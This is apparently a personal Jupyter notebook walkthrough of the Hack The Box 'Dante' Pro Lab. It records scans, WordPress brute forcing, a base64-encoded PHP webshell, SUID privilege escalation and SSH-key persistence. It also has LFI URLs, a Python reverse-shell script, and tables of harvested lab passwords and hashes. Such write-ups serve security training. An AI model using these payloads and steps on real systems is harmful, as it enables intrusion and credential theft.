# Dante Pro Lab

In [1]:
# Command to show variables present...
%whos

Interactive namespace is empty.


<a id="index"></a>
## Index

### Activities

[Global Settings](#global)

[Usernames / Passwords Collected](#usernames)

[Hashes Collected](#hashes)

[Flags Gathered](#flags)

[nmap Port Scan - External Subnet](#nmap)

[nmap Port Scan - Internal Subnet](#nmapinternal)

[Metasploit Multi-Handler](#metahandler)

[Impacket GetADUsers](#impacketgetadusers)

[Impacket GetNPUsers](#impacketgetnpusers)

[Bash Reverse Shell](#bashrevshell)


### Machines

[Dante-Web-NIX01 - 10.10.110.100](#nix01)

[DANTE-NIX02 - 172.16.1.10](#DANTE-NIX02)

[DANTE-WS03 - 172.16.1.102](#DANTE-WS03)


<a id="nix01"></a>
### Dante-Web-NIX01 10.10.110.100

````
1. Login to wordpress http://10.10.110.100:65000/wordpress/wp-admin/ as James - Toyota
    - Used wpscan to identify users of site
    - Used wpscan with the user james to bruteforce passwords using the rockyou.txt list
    
2. Use plugin to get plug.php webshell setup
    - Used the php code to create plug.php as a webshell
    - Used a python playbook to interact with the webshell

echo "<pre>";
system("echo 'PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUWydjbWQnXSkpeyBlY2hvICI8cHJlPiI7ICRjbWQgPSAoJF9SRVFVRVNUWydjbWQnXSk7IHN5c3RlbSgkY21kKTsgZWNobyAiPC9wcmU+IjsgZGllOyB9ID8+Cg==' | base64 -d > /var/www/html/wordpress/wp-content/plug.php");
echo "<br />";
echo "<br />";
system("ls -lha /var/www/html/wordpress/wp-content/");
echo "</pre>";

3. Use webshell to get bash shell
````
[php webshell - 10.10.110.100](#webshell_10.10.110.100)
````
4. Escalate Privileges with find command from GTFObins

find . -exec /bin/sh -p \; -quit

5. Add ssh key or use root ssh key and place in authorized_keys for future pivoting

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDA/2uokzFBUruXUJnYg4Uky2K/+95QSqwJKc4WNz6idoFuanxOv86+phKquFkIyZJXTuq0yf+ABPZSDTKboQWhOMIF+GZa0P3hse/RE6STd8Mj5rs4yOErjYVrLNyJixq5SZQcXQ5JZIaRltGL2CSn6BQClE2ps8wXz0zGg4AjaqsiwhzEbYkK4JWstZKLMoLpVrRymzfVkm4v2F/53veQFd0OQ3J9DeLaQublNttGzslIV6PL+3p7fkNkmeVRoKflpns9npLJwl9113RBwhMycB757oRusZhQv7rkHs/+GtdbePMeRaB/ll9ZzUJIB3Lti4iHuDwVLwr5WCX9v4PRvJEy/iRB/U3BdgrJsGg9otOyWYgq4UXesu+6hDWoWqR3Ampn7/oJQ85LJPKdrcqJTBOMDe7AplOwUiktw8iEx2qCgraxeLCIy9xEYQbSVtt5FVnhNIFv3CoTLn19tkX9MPefyvKUJ3Kg2gvfF0Gl66bo3fcECM6cnywLawS0KW8= kali@kali" >> /root/.ssh/authorized_keys

6. Establish SSH connection: ssh root@10.10.110.100
````


[wpscan - 10.10.110.100](#wpscan_10.10.110.100)

[ffuf - 10.10.110.100](#ffuf_10.10.110.100)

[php webshell - 10.10.110.100](#webshell_10.10.110.100)

[Back to Index](#index)

<a id="DANTE-WS03"></a>
### DANTE-WS03 172.16.1.102

````
OS: Microsoft Windows 10 Pro
Does not appear to be joined to the domain...

1. Through an SSH Tunnel from 10.10.110.100 to port 80 the web page can be accessed (or SSH SOCKS Proxy)
    - Depends on access to 10.10.110.100
    - ssh -L 33000:172.16.1.102:80 -i root_id_rsa root@10.10.110.100
    - ssh -D53000 root@10.10.110.100 - Proxychains is setup for 53000
2. OMRS or the Online Marriage Registration System has an exploit -  https://www.exploit-db.com/exploits/49557
    - Modified the exploit to output the information of the webshell created
    - Used a python playbook to interact with the webshell
3. Webserver is running as Blake, Was able to access user flag on Desktop
4. Trying to find privilege escalation
    - Found in the fileshare and folder c:\projects\server.exe
    - server.exe appears to allow a buffer overflow
    - Server.exe is hardcoded to run on 4444, but unable to see it running on 172.16.1.102
    - Looked at services... 1 service looks suspicious
    - Looked at scheduled tasks... 1 scheduled task looks suspicious
    - Check for smb vulns could not find BlueKeep, etc. with nmap
    - Used accesschk64 to check access on services
    - Windows Defender is running...

````
[webshell_172_16_1_102](#webshell_172_16_1_102)

[chisel](#chisel)

[Back to Index](#index)

<a id="DANTE-NIX02"></a>
### DANTE-NIX02 172.16.1.10


````
OS: Linux

1. From the home page a directory traversal local file inclusion vulnerability can be identified
2. The vulnerability can be used to gather information from /etc and other files
    - Learn the hostname of the computer
    - Learn that frank and margaret are users of the computer
3. Investigating the LFI and RFI vulnerabilities that can be utilized to gain a shell
    - To use proxy with ssh tunnel assigned the IP Address instead of using the default of 127.0.0.1
    - ssh -L 10.10.16.114:33000:172.16.1.10:80 -i root_id_rsa root@10.10.110.100
4. LFI 
    - /home/frank   /bin/bash
    - /home/margaret   /bin/lshell
    - sshd /run/sshd
    
    This works...
    http://noanswer.htb:33000/nav.php?page=php://filter/convert.base64-encode/resource=/etc/passwd
    http://noanswer.htb:33000/nav.php?page=php://filter/convert.base64-encode/resource=/etc/apache2/sites-enabled/000-default.conf
    http://noanswer.htb:33000/nav.php?page=php://filter/convert.base64-encode/resource=/var/www/html/deerhost/nav.php
    http://noanswer.htb:33000/nav.php?page=php://filter/convert.base64-encode/resource=/var/www/html/wordpress/index.php
    http://noanswer.htb:33000/nav.php?page=php://filter/convert.base64-encode/resource=/var/www/html/wordpress/wp-load.php  
   http://noanswer.htb:33000/nav.php?page=php://filter/convert.base64-encode/resource=/var/www/html/wordpress/wp-config.php
   
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME' 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'margaret' );

/** MySQL database password */
define( 'DB_PASSWORD', 'Welcome1!2@3#' );

````

[Back to Index](#index)

#### After you login with margaret and the password through SSH...

Bypassing lshell with vi(m)

If you have access to vi(m), it's also easy to bypass lshell with vi or vim. Start vim:

user:~$ vim

Once inside, issue:

:set shell=/bin/sh
:shell


#### Franks password was in the slack exported data files

grep -r "pass" *  # From her home directory

username: frank
password: TractorHeadtorchDeskmat

#### The apache_restart.py file is executed as root

Create a call.py file like the following listening on the box... Python Library hijack vulnerability
````
cat call.py
import socket
import subprocess
import os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("127.0.0.1", 13337))

os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)

p=subprocess.call(["/bin/sh","-i"])
````

<a id="17"></a>
###  172.16.1.17


In [5]:
# ffuf is not installed by default on kali (apt install ffuf)
outputLocationGoBuster = boxDir + "/ffuf.txt"
destPort = 33000
destIP = "10.10.16.114"
url="http://" + destIP + ":" + str(destPort) + "/FUZZ"
#url="http://" + destIP + "" + "/FUZZ"
#url="https://" + destIP + ":9201" + "/FUZZ"
#url="https://" + destDNS + "/FUZZ"
print(url)
wordlist="/usr/share/wordlists/dirb/big.txt"
!ffuf -u $url -w $wordlist

http://10.10.16.114:33000/FUZZ

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.16.114:33000/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

.bash_history           [Status: 200, Size: 4623, Words: 260, Lines: 37] :: Errors: 0 ::
0-0-1                   [Status: 200, Size: 4623, Words: 260, Lines: 37] :: Errors: 0 ::
.forward                [Status: 200, Size: 4623,

116                     [Status: 200, Size: 4623, Words: 260, Lines: 37]7] :: Errors: 0 ::
1168                    [Status: 200, Size: 4623, Words: 260, Lines: 37]7] :: Errors: 0 ::
117                     [Status: 200, Size: 4623, Words: 260, Lines: 37]8] :: Errors: 0 ::
1166                    [Status: 200, Size: 4623, Words: 260, Lines: 37]8] :: Errors: 0 ::
1224                    [Status: 200, Size: 4623, Words: 260, Lines: 37]8] :: Errors: 0 ::
1193                    [Status: 200, Size: 4623, Words: 260, Lines: 37]8] :: Errors: 0 ::
119                     [Status: 200, Size: 4623, Words: 260, Lines: 37]8] :: Errors: 0 ::
1221                    [Status: 200, Size: 4623, Words: 260, Lines: 37]8] :: Errors: 0 ::
1178                    [Status: 200, Size: 4623, Words: 260, Lines: 37]8] :: Errors: 0 ::
118                     [Status: 200, Size: 4623, Words: 260, Lines: 37]
1169                    [Status: 200, Size: 4623, Words: 260, Lines: 37]
1229                    [Status: 20

1372                    [Status: 200, Size: 4623, Words: 260, Lines: 37]5] :: Errors: 0 ::
151                     [Status: 200, Size: 4623, Words: 260, Lines: 37]5] :: Errors: 0 ::
1383                    [Status: 200, Size: 4623, Words: 260, Lines: 37]5] :: Errors: 0 ::
15                      [Status: 200, Size: 4623, Words: 260, Lines: 37]5] :: Errors: 0 ::
138                     [Status: 200, Size: 4623, Words: 260, Lines: 37]5] :: Errors: 0 ::
143                     [Status: 200, Size: 4623, Words: 260, Lines: 37]5] :: Errors: 0 ::
1379                    [Status: 200, Size: 4623, Words: 260, Lines: 37]5] :: Errors: 0 ::
140                     [Status: 200, Size: 4623, Words: 260, Lines: 37]5] :: Errors: 0 ::
1371                    [Status: 200, Size: 4623, Words: 260, Lines: 37]5] :: Errors: 0 ::
1369                    [Status: 200, Size: 4623, Words: 260, Lines: 37]5] :: Errors: 0 ::
1480                    [Status: 200, Size: 4623, Words: 260, Lines: 37]5] :: Errors: 0 ::

1897                    [Status: 200, Size: 4623, Words: 260, Lines: 37]3] :: Errors: 0 ::
191                     [Status: 200, Size: 4623, Words: 260, Lines: 37]3] :: Errors: 0 ::
1779                    [Status: 200, Size: 4623, Words: 260, Lines: 37]4] :: Errors: 0 ::
1996                    [Status: 200, Size: 4623, Words: 260, Lines: 37]4] :: Errors: 0 ::
194                     [Status: 200, Size: 4623, Words: 260, Lines: 37]4] :: Errors: 0 ::
158                     [Status: 200, Size: 4623, Words: 260, Lines: 37]4] :: Errors: 0 ::
1990                    [Status: 200, Size: 4623, Words: 260, Lines: 37]5] :: Errors: 0 ::
193                     [Status: 200, Size: 4623, Words: 260, Lines: 37]5] :: Errors: 0 ::
196                     [Status: 200, Size: 4623, Words: 260, Lines: 37]5] :: Errors: 0 ::
1955                    [Status: 200, Size: 4623, Words: 260, Lines: 37]5] :: Errors: 0 ::
1951                    [Status: 200, Size: 4623, Words: 260, Lines: 37]5] :: Errors: 0 ::

2d                      [Status: 200, Size: 4623, Words: 260, Lines: 37]3] :: Errors: 0 ::
304                     [Status: 200, Size: 4623, Words: 260, Lines: 37]3] :: Errors: 0 ::
2welcome                [Status: 200, Size: 4623, Words: 260, Lines: 37]3] :: Errors: 0 ::
2g                      [Status: 200, Size: 4623, Words: 260, Lines: 37]3] :: Errors: 0 ::
2z                      [Status: 200, Size: 4623, Words: 260, Lines: 37]4] :: Errors: 0 ::
305                     [Status: 200, Size: 4623, Words: 260, Lines: 37]4] :: Errors: 0 ::
3000                    [Status: 200, Size: 4623, Words: 260, Lines: 37]4] :: Errors: 0 ::
3                       [Status: 200, Size: 4623, Words: 260, Lines: 37]4] :: Errors: 0 ::
297                     [Status: 200, Size: 4623, Words: 260, Lines: 37]4] :: Errors: 0 ::
306                     [Status: 200, Size: 4623, Words: 260, Lines: 37]4] :: Errors: 0 ::
30                      [Status: 200, Size: 4623, Words: 260, Lines: 37]4] :: Errors: 0 ::

...

Articles                [Status: 200, Size: 4623, Words: 260, Lines: 37]1] :: Errors: 0 ::
Blog                    [Status: 200, Size: 4623, Words: 260, Lines: 37]1] :: Errors: 0 ::
Archive                 [Status: 200, Size: 4623, Words: 260, Lines: 37]
815                     [Status: 200, Size: 4623, Words: 260, Lines: 37]1] :: Errors: 0 ::
Books                   [Status: 200, Size: 4623, Words: 260, Lines: 37]1] :: Errors: 0 ::
94                      [Status: 200, Size: 4623, Words: 260, Lines: 37]2] :: Errors: 0 ::
8675309                 [Status: 200, Size: 0, Words: 1, Lines: 1]0:01:32] :: Errors: 0 ::
859                     [Status: 200, Size: 0, Words: 1, Lines: 1]0:01:32] :: Errors: 0 ::
CPAN                    [Status: 200, Size: 4623, Words: 260, Lines: 37]2] :: Errors: 0 ::
DB                      [Status: 200, Size: 4623, Words: 260, Lines: 37]2] :: Errors: 0 ::
CMS                     [Status: 200, Size: 4623, Words: 260, Lines: 37]2] :: Errors: 0 ::
D                

Lotus_Domino_Admin      [Status: 200, Size: 4623, Words: 260, Lines: 37]41] :: Errors: 0 ::
Menus                   [Status: 200, Size: 4623, Words: 260, Lines: 37]41] :: Errors: 0 ::
Office                  [Status: 200, Size: 4623, Words: 260, Lines: 37]41] :: Errors: 0 ::
Index                   [Status: 200, Size: 4623, Words: 260, Lines: 37]41] :: Errors: 0 ::
P                       [Status: 200, Size: 4623, Words: 260, Lines: 37]41] :: Errors: 0 ::
O                       [Status: 200, Size: 4623, Words: 260, Lines: 37]41] :: Errors: 0 ::
Projects                [Status: 200, Size: 4623, Words: 260, Lines: 37]41] :: Errors: 0 ::
OA_HTML                 [Status: 200, Size: 4623, Words: 260, Lines: 37]41] :: Errors: 0 ::
PHP                     [Status: 200, Size: 4623, Words: 260, Lines: 37]41] :: Errors: 0 ::
Logs                    [Status: 200, Size: 4623, Words: 260, Lines: 37]41] :: Errors: 0 ::
RCS                     [Status: 200, Size: 4623, Words: 260, Lines: 37]41] :: E

TEST                    [Status: 200, Size: 4623, Words: 260, Lines: 37]50] :: Errors: 0 ::
Spy                     [Status: 200, Size: 4623, Words: 260, Lines: 37]50] :: Errors: 0 ::
UserFiles               [Status: 200, Size: 4623, Words: 260, Lines: 37]50] :: Errors: 0 ::
V                       [Status: 200, Size: 4623, Words: 260, Lines: 37]50] :: Errors: 0 ::
Video                   [Status: 200, Size: 4623, Words: 260, Lines: 37]50] :: Errors: 0 ::
U                       [Status: 200, Size: 4623, Words: 260, Lines: 37]50] :: Errors: 0 ::
X                       [Status: 200, Size: 4623, Words: 260, Lines: 37]50] :: Errors: 0 ::
XXX                     [Status: 200, Size: 4623, Words: 260, Lines: 37]50] :: Errors: 0 ::
]                       [Status: 200, Size: 4623, Words: 260, Lines: 37]51] :: Errors: 0 ::
__                      [Status: 200, Size: 4623, Words: 260, Lines: 37]51] :: Errors: 0 ::
W3SVC                   [Status: 200, Size: 4623, Words: 260, Lines: 37]51] :: E

_cronjobs               [Status: 200, Size: 4623, Words: 260, Lines: 37]00] :: Errors: 0 ::
_configs                [Status: 200, Size: 4623, Words: 260, Lines: 37]00] :: Errors: 0 ::
_common                 [Status: 200, Size: 4623, Words: 260, Lines: 37]00] :: Errors: 0 ::
_content                [Status: 200, Size: 4623, Words: 260, Lines: 37]00] :: Errors: 0 ::
_contact                [Status: 200, Size: 4623, Words: 260, Lines: 37]00] :: Errors: 0 ::
_cs_apps                [Status: 200, Size: 4623, Words: 260, Lines: 37]00] :: Errors: 0 ::
_alt                    [Status: 200, Size: 0, Words: 1, Lines: 1][0:02:00] :: Errors: 0 ::
_components             [Status: 200, Size: 4623, Words: 260, Lines: 37]00] :: Errors: 0 ::
_ast                    [Status: 200, Size: 4623, Words: 260, Lines: 37]00] :: Errors: 0 ::
_control                [Status: 200, Size: 4623, Words: 260, Lines: 37]00] :: Errors: 0 ::
_cgidata                [Status: 200, Size: 4623, Words: 260, Lines: 37]01] :: E

_func                   [Status: 200, Size: 4623, Words: 260, Lines: 37]09] :: Errors: 0 ::
_geoip                  [Status: 200, Size: 4623, Words: 260, Lines: 37]09] :: Errors: 0 ::
_gallery                [Status: 200, Size: 4623, Words: 260, Lines: 37]09] :: Errors: 0 ::
_functions              [Status: 200, Size: 4623, Words: 260, Lines: 37]09] :: Errors: 0 ::
_gsdata_                [Status: 200, Size: 4623, Words: 260, Lines: 37]09] :: Errors: 0 ::
_globals                [Status: 200, Size: 4623, Words: 260, Lines: 37]09] :: Errors: 0 ::
_dsn                    [Status: 200, Size: 4623, Words: 260, Lines: 37]09] :: Errors: 0 ::
_graphics               [Status: 200, Size: 4623, Words: 260, Lines: 37]10] :: Errors: 0 ::
_i3                     [Status: 200, Size: 4623, Words: 260, Lines: 37]10] :: Errors: 0 ::
_iis_customdocs         [Status: 200, Size: 4623, Words: 260, Lines: 37]10] :: Errors: 0 ::
_header                 [Status: 200, Size: 4623, Words: 260, Lines: 37]10] :: E

<a id="global"></a>
## Global Settings

[Back to Index](#index)

In [1]:
# Dante Subnet Range
danteSubnet = '10.10.110.0/24'
## Out-of-Scope 10.10.110.2
vpnIP = "10.10.16.114"

# Box Information
nickname = "172_16_1_17"        
dnsName = "172_16_1_17.local"
destDNS = dnsName
destIP = '172.16.1.17'

####
# Create the Output Directory for the Below Information Gathered
currentDir = "/home/kali/hackthebox/dante"
outputDir = currentDir + "/output"
print("Output Directory:" + outputDir)
!mkdir -p $outputDir

# Create directories for the box
boxDir = outputDir + "/" + nickname
print("Box Directory:" + boxDir)
!mkdir -p $boxDir

Output Directory:/home/kali/hackthebox/dante/output
Box Directory:/home/kali/hackthebox/dante/output/172_16_1_17


<a id="usernames"></a>
## Usernames and/or Passwords Collected

[Back to Index](#index)

|Box|IP Address|Username|Password|Notes|
|:-|:-|:-|:-|:-|
|DANTE-WEB-NIX01|10.10.110.100,172.16.1.100|anonymous|anon@anon.text|Anonymous FTP|
|DANTE-WEB-NIX01|10.10.110.100,172.16.1.100|shaun|password|From config.in.php swap file|
|DANTE-WEB-NIX01|10.10.110.100,172.16.1.100|james|Toyota|Password brute force - wordpress|
|DANTE-WEB-NIX01|10.10.110.100,172.16.1.100|balthazar||/etc/shadow|
|DANTE-WEB-NIX01|10.10.110.100,172.16.1.100|james|Toyota|/etc/shadow|
|DANTE-WS03|172.16.1.102|Administrator|-|Learned of user through webshell|
|DANTE-WS03|172.16.1.102|blake|-|Running as user for WAMP|
|DANTE-NIX02|172.16.1.10|frank|TractorHeadtorchDeskmat|Found password in slack history of margaret|
|DANTE-NIX02|172.16.1.10||69F15HST1CX|Found password in slack history of frank|
|DANTE-NIX02|172.16.1.10||STARS5678FORTUNE401|Found password in slack history of frank|
|DANTE-NIX02|172.16.1.10|margaret|Welcome1!2@3#|Learned about through LFI to /etc/passwd|
|DANTE-NIX03|172.16.1.17|admin|Password6543|Found in pcap on forensics share|


<a id="hashes"></a>
## Hashes Collected

[Back to Index](#index)

````
DANTE-WEB-NIX01 - balthazar - $6$ADBqqluuRH6W2..l$WKhIu1hD1xnlq9/ZFgLvuWjH11nSGN4FgWVHBTr9e9TtDnmrnc.DuVhQqRdmv07zTYA8/4N3cigy1V9uuf7Ie0

DANTE-NIX03 - lou - 
$1$xwTOYjsf$eLCM7qLeJqPCeDv4GpMg51
````

<a id="flags"></a>
## Flags Gathered

[Back to Index](#index)

|Box|IP Address|Account|Flag Description|Notes|
|:-|:-|:-|:-|:-|
|DANTE-WEB-NIX01|10.10.110.100,172.16.1.100||I'm nuts and bolts about you|Found during recon|
|DANTE-WEB-NIX01|10.10.110.100,172.16.1.100|root|It's easier this way|Found in /home/james/|
|DANTE-WEB-NIX01|10.10.110.100,172.16.1.100|root|Show me the way|Found in /root|
|DANTE-WS03|172.16.1.102|blake|Congratulations to a perfect pear|Found on desktop of black|
|DANTE-NIX02|172.16.1.10|www-data|Seclusion is an illusion|LFI to margarets desktop for the flag|
|DANTE-NIX02|172.16.1.10|root|Snake it 'til you make it|
|DANTE-NIX03|172.16.1.17|root|Feeling fintastic|

<a id="nmap"></a>
## nmap - External Subnet
Scan subnet for information of the hosts present

[Back to Index](#index)

In [5]:
# Scan the broad subnet for Dante
outputLocation = outputDir + '/nmapNetwork.txt'
# Conducted a host discovery scan and it failed added the -Pn to disable host discovery...
# Narrowed the scope of the scan down to 22,80 and 443 ports
!nmap -Pn -p22,80,443 --min-rate=1000 -T4 $danteSubnet -oN $outputLocation

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-08 18:37 EDT
Nmap scan report for 10.10.110.0
Host is up.

PORT    STATE    SERVICE
22/tcp  filtered ssh
80/tcp  filtered http
443/tcp filtered https

Nmap scan report for 10.10.110.1
Host is up.

PORT    STATE    SERVICE
22/tcp  filtered ssh
80/tcp  filtered http
443/tcp filtered https

Nmap scan report for 10.10.110.2
Host is up.

PORT    STATE    SERVICE
22/tcp  filtered ssh
80/tcp  filtered http
443/tcp filtered https

Nmap scan report for 10.10.110.3
Host is up.

PORT    STATE    SERVICE
22/tcp  filtered ssh
80/tcp  filtered http
443/tcp filtered https

Nmap scan report for 10.10.110.4
Host is up.

PORT    STATE    SERVICE
22/tcp  filtered ssh
80/tcp  filtered http
443/tcp filtered https

Nmap scan report for 10.10.110.5
Host is up.

PORT    STATE    SERVICE
22/tcp  filtered ssh
80/tcp  filtered http
443/tcp filtered https

Nmap scan re

### 10.10.110.100 

````
21/tcp    open  ftp     vsftpd 3.0.3
# Anonymous FTP is allowed...

22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
65000/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
````

In [7]:
outputLocation = outputDir + '/nmap110_100.txt'
!nmap -Pn -sV 10.10.110.100 -oN $outputLocation

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-08 18:42 EDT
Nmap scan report for 10.10.110.100
Host is up (0.10s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
65000/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.32 seconds


In [8]:
# Using nmap to find any vulnerabilities
outputLocationScripts = boxDir + '/nmapScripts.txt'
#!nmap -p80 -Pn -sV --script default,safe $destIP -oN $outputLocationScripts
!nmap -p21,22,65000 -Pn -sV --script default,safe 10.10.110.100 -oN $outputLocationScripts

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-08 18:46 EDT
Pre-scan script results:
|_hostmap-robtex: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
|_http-robtex-shared-ns: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
| targets-asn: 
|_  targets-asn.asn is a mandatory parameter
Nmap scan report for 10.10.110.100
Host is up (0.086s latency).

PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
|_banner: 220 (vsFTPd 3.0.3)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV IP 172.16.1.100 is not the same as 10.10.110.100
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.16.114
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is pl

<a id="wpscan_10.10.110.100"></a>
## wpscan - 10.10.110.100
Scan subnet for information of the hosts present

[Back to Index](#index)

In [10]:
## From the above we identify it as a wordpress site
outputLocation = boxDir + '/wpscan.txt'
!wpscan --url http://10.10.110.100:65000/wordpress/ -o $outputLocation
!cat $outputLocation

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.14
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.110.100:65000/wordpress/ [10.10.110.100]
[+] Started: Thu Jul  8 18:58:58 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://10.10.110.100:65000/wordpress/robots.txt
 | Found By: Robots Txt (Aggressive Detection

#### Notes from wp-scan

````
Notes from the wp-scan

DB Username - shaun
DB Password - password


SQL Injection exploit in v5.4.1 (Authenticated)

Interesting -- https://10.10.110.100:65000/wordpress/wp-includes/IXR/

[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - james / Toyota                                                                                                                                                                                   
Trying james / TUPAC1 Time: 00:30:18 <                                                                                                                            > (108480 / 14409408)  0.75%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: james, Password: Toyota


````

In [11]:
# Enumerating users
## From the above we identify it as a wordpress site
outputLocation = boxDir + '/wpscan_enum_users.txt'
!wpscan --url http://10.10.110.100:65000/wordpress/ --enumerate u -o $outputLocation
!cat $outputLocation

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.14
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.110.100:65000/wordpress/ [10.10.110.100]
[+] Started: Thu Jul  8 19:29:06 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://10.10.110.100:65000/wordpress/robots.txt
 | Found By: Robots Txt (Aggressive Detection

In [12]:
# Enumerating plugins
## From the above we identify it as a wordpress site
outputLocation = boxDir + '/wpscan_enum_plugins.txt'
!wpscan --url http://10.10.110.100:65000/wordpress/ --enumerate p -o $outputLocation
!cat $outputLocation

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.14
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.110.100:65000/wordpress/ [10.10.110.100]
[+] Started: Thu Jul  8 19:29:19 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://10.10.110.100:65000/wordpress/robots.txt
 | Found By: Robots Txt (Aggressive Detection

In [22]:
# Enumerating Database Exports
## From the above we identify it as a wordpress site
outputLocation = boxDir + '/wpscan_enum_db_exports.txt'
!wpscan --url http://10.10.110.100:65000/wordpress/ --enumerate dbe,m,tt,vp -o $outputLocation
!cat $outputLocation

_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.14
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.110.100:65000/wordpress/ [10.10.110.100]
[+] Started: Thu Jul  8 20:25:51 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://10.10.110.100:65000/wordpress/robots.txt
 | Found By: Robots Txt (Aggressive Detection

In [16]:
# Brute passwords for james
## From the above we identify it as a wordpress site
outputLocation = boxDir + '/wpscan_james_password.txt'
!wpscan --url "http://10.10.110.100:65000/wordpress/" -U users.txt -P rockyou.txt -o $outputLocation
!cat $outputLocation


Scan Aborted: invalid option: -w
cat: /home/kali/hackthebox/dante/output/10_10_110_100/wpscan_james_password.txt: No such file or directory


<a id="ffuf_10.10.110.100"></a>
## ffuf 10.10.110.100

[Back to Index](#index)

In [19]:
# ffuf is not installed by default on kali (apt install ffuf)
outputLocationGoBuster = boxDir + "/ffuf.txt"
destPort = 65000
url="http://" + destIP + ":" + str(destPort) + "/FUZZ"
#url="http://" + destIP + "" + "/FUZZ"
#url="https://" + destIP + ":9201" + "/FUZZ"
#url="https://" + destDNS + "/FUZZ"
print(url)
wordlist="/usr/share/wordlists/dirb/big.txt"
!ffuf -u $url -w $wordlist

http://10.10.110.100:65000/FUZZ

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
